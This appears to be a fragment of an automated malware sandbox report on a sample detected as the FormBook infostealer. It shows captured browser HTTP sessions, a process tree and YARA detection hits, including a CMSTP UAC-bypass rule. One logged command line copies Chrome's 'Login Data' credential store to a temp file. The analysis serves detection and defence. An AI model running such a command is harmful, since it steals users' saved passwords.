                                Accept-Ranges: bytes
                                ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                Server: Microsoft-IIS/10.0
                                X-AspNetMvc-Version: 5.3
                                MS-CorrelationId: b8fd5aba-165f-4514-b64d-af0793860a7e
                                MS-RequestId: 4521fac2-255a-4d69-8836-c2607fd66b03
                                MS-CV: jeXOiG7+zK6E3KImhSgwIJ.0
                                X-AspNet-Version: 4.0.30319
                                X-Powered-By: ASP.NET
                                X-Powered-By: ARR/3.0
                                X-Powered-By: ASP.NET
                                Content-Length: 11185
                                Cache-Control: public, max-age=86376
                                Date: Mon, 27 May 2024 06:42:42 GMT
                                Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
                                Connection: close
                                Akamai-Request-BC: [a=23.216.152.197,b=2097997444,c=g,n=US_NJ_EDISON,o=20940],[c=c,n=US_NJ_EDISON,o=20940]
                                MSREGION:
                                X-CCC:
                                X-CID: 3
                                Akamai-GRN: 0.c598d817.1716792162.7d0ce684
                                Access-Control-Max-Age: 86400
                                Access-Control-Allow-Credentials: true
                                Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC
                                Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
                                Access-Control-Allow-Methods: GET,POST,OPTIONS
                                Access-Control-Allow-Origin: *


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                6 | 192.168.2.4 | 49788 | 151.101.130.137 | 443 | 7196 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:45 UTC | 307 | OUT | GET /jquery-3.6.3.min.js HTTP/1.1
                                Accept: application/javascript, */*;q=0.8
                                Referer: https://www.msn.com/?ocid=iehp
                                Accept-Language: en-CH
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Accept-Encoding: gzip, deflate
                                Host: code.jquery.com
                                Connection: Keep-Alive
                                2024-05-27 06:42:45 UTC | 567 | IN | HTTP/1.1 200 OK
                                Connection: close
                                Content-Length: 89947
                                Server: nginx
                                Content-Type: application/javascript; charset=utf-8
                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                ETag: "28feccc0-15f5b"
                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                Access-Control-Allow-Origin: *
                                Via: 1.1 varnish, 1.1 varnish
                                Accept-Ranges: bytes
                                Age: 413904
                                Date: Mon, 27 May 2024 06:42:45 GMT
                                X-Served-By: cache-lga13623-LGA, cache-nyc-kteb1890092-NYC
                                X-Cache: HIT, MISS
                                X-Cache-Hits: 61, 0
                                X-Timer: S1716792165.378029,VS0,VE3
                                Vary: Accept-Encoding


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                7 | 192.168.2.4 | 49783 | 18.244.18.38 | 443 | 7196 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:45 UTC | 519 | OUT | GET /b?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                Referer: https://www.msn.com/?ocid=iehp
                                Accept-Language: en-CH
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Accept-Encoding: gzip, deflate
                                Host: sb.scorecardresearch.com
                                Connection: Keep-Alive
                                2024-05-27 06:42:45 UTC | 657 | IN | HTTP/1.1 302 Found
                                Content-Length: 0
                                Connection: close
                                Date: Mon, 27 May 2024 06:42:45 GMT
                                Location: /b2?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                set-cookie: UID=1A6d1ece6e9f2b87dd0eb831716792165; domain=.scorecardresearch.com; path=/; max-age=62208000
                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                X-Cache: Miss from cloudfront
                                Via: 1.1 111f802abddccd55d219ff1635e1aa4a.cloudfront.net (CloudFront)
                                X-Amz-Cf-Pop: FRA56-P11
                                X-Amz-Cf-Id: 0nR7BQed94QvLzuWAPXS9Ii_Ba2YRCu22oFbTvWm8ZIuDl35Zr_QXA==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                8 | 192.168.2.4 | 49782 | 18.244.18.38 | 443 | 7196 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:45 UTC | 567 | OUT | GET /b2?rn=1716792163636&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                Referer: https://www.msn.com/?ocid=iehp
                                Accept-Language: en-CH
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Accept-Encoding: gzip, deflate
                                Host: sb.scorecardresearch.com
                                Connection: Keep-Alive
                                Cookie: UID=1A6d1ece6e9f2b87dd0eb831716792165
                                2024-05-27 06:42:46 UTC | 327 | IN | HTTP/1.1 204 No Content
                                Connection: close
                                Date: Mon, 27 May 2024 06:42:45 GMT
                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                X-Cache: Miss from cloudfront
                                Via: 1.1 3caf29bae8aa1020b6ba57a71bbb0880.cloudfront.net (CloudFront)
                                X-Amz-Cf-Pop: FRA56-P11
                                X-Amz-Cf-Id: PHsYgWd66gRoKiAf_TjNC61dodISyLbDKp_HWQJKf77NBdIBOz2a5A==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                9 | 192.168.2.4 | 49798 | 18.244.18.38 | 443 | 8640 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:46 UTC | 566 | OUT | GET /b?rn=1716792164814&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=37035836015567CA33574CBA00376661&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                Referer: https://www.msn.com/?ocid=iehp
                                Accept-Language: en-CH
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Accept-Encoding: gzip, deflate
                                Host: sb.scorecardresearch.com
                                Connection: Keep-Alive
                                Cookie: UID=1A6d1ece6e9f2b87dd0eb831716792165
                                2024-05-27 06:42:46 UTC | 435 | IN | HTTP/1.1 204 No Content
                                Connection: close
                                Date: Mon, 27 May 2024 06:42:46 GMT
                                set-cookie: UID=1A6d1ece6e9f2b87dd0eb831716792165; domain=.scorecardresearch.com; path=/; max-age=62208000
                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                X-Cache: Miss from cloudfront
                                Via: 1.1 11c65b00bf7f76c861a15dcad5558b9c.cloudfront.net (CloudFront)
                                X-Amz-Cf-Pop: FRA56-P11
                                X-Amz-Cf-Id: 1yUkMCbzr0VajFnuYCeVZfdwJGjn7v_96v_g1-_UF7dH-O5OLORbig==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                10 | 192.168.2.4 | 49806 | 13.107.246.40 | 443 | 5780 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:47 UTC | 619 | OUT | GET /assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=Z66hqSRAIxK%2FfuiudWUa9VEzQbPIGUiDfcuGAIlqgPw%3D&st=2021-01-01T00%3A00%3A00Z&se=2024-07-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService HTTP/1.1
                                Host: edgeassetservice.azureedge.net
                                Connection: keep-alive
                                Edge-Asset-Group: ArbitrationService
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: empty
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                2024-05-27 06:42:47 UTC | 638 | IN | HTTP/1.1 200 OK
                                Date: Mon, 27 May 2024 06:42:47 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 11989
                                Connection: close
                                Content-MD5: 2Sac1JgWnA2goeZEYMrzXg==
                                Last-Modified: Mon, 20 May 2024 18:05:48 GMT
                                ETag: "0x8DC78F77AA84B37"
                                x-ms-request-id: e28b2738-b01e-0018-3901-b04592000000
                                x-ms-version: 2017-07-29
                                x-ms-lease-status: unlocked
                                x-ms-lease-state: available
                                x-ms-blob-type: BlockBlob
                                x-ms-server-encrypted: true
                                x-azure-ref: 20240527T064247Z-16f669959b4k284257wnqd0qt800000002kg00000000h1hf
                                Cache-Control: public, max-age=604800
                                x-fd-int-roxy-purgeid: 69316365
                                X-Cache: TCP_MISS
                                Accept-Ranges: bytes
                                2024-05-27 06:42:47 UTC | 11989 | IN | Data Ascii: { "configVersion": 32, "PrivilegedExperiences": [ "ShorelinePrivilegedExperienceID", "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT", "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND", "SHOPPING_AUTO_SHOW_BING_SEARCH", "SHOPPING_AUTO_SHOW_REBATE


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                11 | 192.168.2.4 | 49815 | 151.101.1.108 | 443 | 8640 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:49 UTC | 297 | OUT | GET /ast/ast.js HTTP/1.1
                                Accept: application/javascript, */*;q=0.8
                                Referer: https://www.msn.com/?ocid=iehp
                                Accept-Language: en-CH
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Accept-Encoding: gzip, deflate
                                Host: acdn.adnxs.com
                                Connection: Keep-Alive
                                2024-05-27 06:42:49 UTC | 558 | IN | HTTP/1.1 200 OK
                                Connection: close
                                Content-Length: 125250
                                Server: nginx/1.18.0 (Ubuntu)
                                Content-Type: application/javascript
                                Last-Modified: Tue, 13 Feb 2024 18:28:18 GMT
                                ETag: "65cbb4c2-1e942"
                                Expires: Sat, 06 Apr 2024 04:44:15 GMT
                                Cache-Control: max-age=86402
                                Access-Control-Allow-Origin: *
                                Via: 1.1 varnish, 1.1 varnish
                                Accept-Ranges: bytes
                                Age: 75005
                                Date: Mon, 27 May 2024 06:42:49 GMT
                                X-Served-By: cache-lga21942-LGA, cache-ewr18140-EWR
                                X-Cache: HIT, HIT
                                X-Cache-Hits: 35, 0
                                X-Timer: S1716792169.498471,VS0,VE1
                                Vary: Accept-Encoding


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                12 | 192.168.2.4 | 49827 | 142.250.80.74 | 443 | 5780 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:50 UTC | 448 | OUT | POST /chromewebstore/v1.1/items/verify HTTP/1.1
                                Host: www.googleapis.com
                                Connection: keep-alive
                                Content-Length: 119
                                Content-Type: application/json
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: empty
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                2024-05-27 06:42:50 UTC | 119 | OUT | Data Ascii: {"hash":"+eOSFXv6O6q7GfOu5P/Vuy9t+lp3ro8nkXTxBg7DQmc=","ids":["ghbmnnjooekpmoecnnnilnnbdlolhkhi"],"protocol_version":1}
                                2024-05-27 06:42:50 UTC | 341 | IN | HTTP/1.1 200 OK
                                Content-Type: application/json; charset=UTF-8
                                Vary: Origin
                                Vary: X-Origin
                                Vary: Referer
                                Date: Mon, 27 May 2024 06:42:50 GMT
                                Server: ESF
                                Content-Length: 483
                                X-XSS-Protection: 0
                                X-Frame-Options: SAMEORIGIN
                                X-Content-Type-Options: nosniff
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close
                                2024-05-27 06:42:50 UTC | 483 | IN | Data Ascii: { "protocol_version": 1, "signature": "GqMmfabZ5eOQbWX9M1Ug4CIlfIIxM+gCsMtaOZnAfG4mwn90jKj5NQAeemJnJADayfs0gmCmr7wdKbdhEyCZixmBxA9MkVpHkTumCZFdc4PsFXbiPY2yLi2xWA/kvmd2bym+uvWJdllMH9BocZScyDMHmUvRpTeVwlTlM3ER2jBrMaiNiRTjE63PmKkrfWVP/QPBdYTIN9q5WgPR8i49


                                Target ID:0
                                Start time:02:42:01
                                Start date:27/05/2024
                                Path:C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe"
                                Imagebase:0x21cce100000
                                File size:575'728 bytes
                                MD5 hash:84144B6048277290BB6EB647BBC5AD2A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1904365892.0000021CCFFF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                Target ID:1
                                Start time:02:42:06
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:true

                                Target ID:4
                                Start time:02:42:06
                                Start date:27/05/2024
                                Path:C:\Windows\System32\WerFault.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\WerFault.exe -u -p 7532 -s 1080
                                Imagebase:0x7ff6d5ea0000
                                File size:570'736 bytes
                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:02:42:07
                                Start date:27/05/2024
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff72b770000
                                File size:5'141'208 bytes
                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Target ID:6
                                Start time:02:42:10
                                Start date:27/05/2024
                                Path:C:\Windows\SysWOW64\mstsc.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                Imagebase:0x300000
                                File size:1'264'640 bytes
                                MD5 hash:EA4A02BE14C405327EEBA8D9AD2BD42C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:false

                                Target ID:8
                                Start time:02:42:20
                                Start date:27/05/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                Imagebase:0x240000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:02:42:20
                                Start date:27/05/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:02:42:28
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:13
                                Start time:02:42:28
                                Start date:27/05/2024
                                Path:C:\Program Files\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                                Imagebase:0x7ff7aea80000
                                File size:834'512 bytes
                                MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:false

                                Target ID:14
                                Start time:02:42:28
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9474 /prefetch:2
                                Imagebase:0xb80000
                                File size:828'368 bytes
                                MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate
                                Has exited:false

                                Target ID:15
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
                                Imagebase:0x7ff6faf30000
                                File size:540'712 bytes
                                MD5 hash:89CF8972D683795DAB6901BC9456675D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:16
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
                                Imagebase:0x7ff6faf30000
                                File size:540'712 bytes
                                MD5 hash:89CF8972D683795DAB6901BC9456675D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:17
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                                Imagebase:0x4b0000
                                File size:85'632 bytes
                                MD5 hash:F9A898A606E7F5A1CD7CFFA8079253A0
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:18
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
                                Imagebase:0x4b0000
                                File size:85'632 bytes
                                MD5 hash:F9A898A606E7F5A1CD7CFFA8079253A0
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:19
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
                                Imagebase:0x7ff67dcd0000
                                File size:4'210'216 bytes
                                MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:false

                                Target ID:20
                                Start time:02:42:31
                                Start date:27/05/2024
                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                Imagebase:0x7ff6bf500000
                                File size:676'768 bytes
                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                Has elevated privileges:false
                                Has administrator privileges:false
